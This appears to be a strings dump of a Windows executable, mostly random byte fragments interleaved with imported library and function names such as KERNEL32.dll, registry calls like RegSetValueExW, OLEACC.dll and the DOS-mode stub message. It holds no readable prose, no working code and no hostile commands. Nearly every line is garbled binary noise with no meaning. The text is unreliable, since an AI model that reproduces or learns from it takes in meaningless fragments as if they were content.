J?Tsr_m
jW){P$
k3<4Tqa
|K}5<B
&Kai,n
<kB R2
k	|d[K
KERNEL32.dll
+Kf)C^
KillTimer
`:Ky04
 `lgd(
LockResource
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
M_,//{
m68vLxT
M7}K?D
?masfh 
.Mji0)
M'u6lh
MultiByteToWideChar
N38.H U
N]lan8
N_=U` 
*n`=(y
Ohi}I]
ole32.dll
OLEACC.dll
OutputDebugStringW
]ovTQ~
oW{;:R
o] y(4
PathCombineW
PathFileExistsW
PB;)f/
p	E&^]*SL"
}pg@:|^
PostThreadMessageW
P|OvU?2:
-PSB59>n2C
{=+]~Q
_q7>c$
	,qIzzn
qp\v'^j
qY8Fa9
R$9O`]m
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
R=nGZ,
RVZ4Qf
;!'S\>
S\28w4M
S4OAQH
ScLe_dvR
SendMessageA
SetTimer
Sf)D\q
SHLWAPI.dll
`SsQHa
sTKkk?
StringFromCLSID
StringFromGUID2
SXyEK-
;"T<dx
!This program cannot be run in DOS mode.
--(\<+tI
TranslateMessage
,t)_rS
t`tzKI)m
Tv}pw_B
&//:ty
-uG|ZC
UnregisterClassA
@ur`x&
U{sEpK
USER32.dll
V3O<y_jE
]Vp)~\A
V+puX8
[vWt~8k
vxmiJ0
WE[q@e
W^I-.1
WideCharToMultiByte
W .KNX
^]W)|q
wsprintfW
+ ,WYJ
[x8K`H
X=I4mB=$^
XL$Bp-2#~
xVxGgZ]
zXM>>\